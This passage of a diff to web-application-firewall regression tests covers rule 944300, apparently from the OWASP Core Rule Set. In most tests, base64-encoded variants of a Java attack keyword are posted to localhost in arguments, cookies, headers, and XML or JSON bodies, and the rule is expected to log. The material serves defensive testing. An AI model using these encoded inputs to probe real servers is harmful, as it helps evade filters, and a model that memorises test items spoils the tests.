"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: d2hpbGVjbG9zdXJl - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-303 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: d2hpbGVjbG9zdXJl + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 303 desc: "XML attribute value includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-304 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 304 desc: "XML element value includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "d2hpbGVjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-305 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "d2hpbGVjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_id: 305 desc: "Nested XML element value includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "d2hpbGVjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-306 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "d2hpbGVjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_id: 306 desc: "Content-Type text/plain includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=d2hpbGVjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-307 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=d2hpbGVjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_id: 307 desc: "Content-Type application/json arg value includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"d2hpbGVjbG9zdXJl\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-308 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"d2hpbGVjbG9zdXJl\"}" + output: + log_contains: "id \"944300\"" + - test_id: 308 desc: "Content-Type application/json arg name includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"d2hpbGVjbG9zdXJl\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-309 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"d2hpbGVjbG9zdXJl\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 309 desc: "Argument test includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HdoaWxlY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-310 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HdoaWxlY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_id: 310 desc: "Argument name includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HdoaWxlY2xvc3VyZQ=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-311 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HdoaWxlY2xvc3VyZQ=test" + output: + log_contains: "id \"944300\"" + - test_id: 311 desc: "Cookie test includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=HdoaWxlY2xvc3VyZQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-312 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HdoaWxlY2xvc3VyZQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 312 desc: "Cookie name includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: HdoaWxlY2xvc3VyZQ=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-313 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HdoaWxlY2xvc3VyZQ=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 313 desc: "Request header test includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: HdoaWxlY2xvc3VyZQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-314 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HdoaWxlY2xvc3VyZQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 314 desc: "XML attribute value includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-315 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 315 desc: "XML element value includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HdoaWxlY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-316 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HdoaWxlY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_id: 316 desc: "Nested XML element value includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HdoaWxlY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-317 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HdoaWxlY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_id: 317 desc: "Content-Type text/plain includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HdoaWxlY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-318 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HdoaWxlY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_id: 318 desc: "Content-Type application/json arg value includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"HdoaWxlY2xvc3VyZQ\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-319 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"HdoaWxlY2xvc3VyZQ\"}" + output: + log_contains: "id \"944300\"" + - test_id: 319 desc: "Content-Type application/json arg name includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"HdoaWxlY2xvc3VyZQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-320 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"HdoaWxlY2xvc3VyZQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 320 desc: "Argument test includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=B3aGlsZWNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-321 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=B3aGlsZWNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_id: 321 desc: "Argument name includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "B3aGlsZWNsb3N1cmU=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-322 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "B3aGlsZWNsb3N1cmU=test" + output: + log_contains: "id \"944300\"" + - test_id: 322 desc: "Cookie test includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=B3aGlsZWNsb3N1cmU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-323 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=B3aGlsZWNsb3N1cmU + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 323 desc: "Cookie name includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: B3aGlsZWNsb3N1cmU=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-324 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: B3aGlsZWNsb3N1cmU=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 324 desc: "Request header test includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: B3aGlsZWNsb3N1cmU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-325 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: B3aGlsZWNsb3N1cmU + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 325 desc: "XML attribute value includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-326 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 326 desc: "XML element value includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "B3aGlsZWNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-327 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "B3aGlsZWNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_id: 327 desc: "Nested XML element value includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "B3aGlsZWNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-328 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "B3aGlsZWNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_id: 328 desc: "Content-Type text/plain includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=B3aGlsZWNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-329 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=B3aGlsZWNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_id: 329 desc: "Content-Type application/json arg value includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 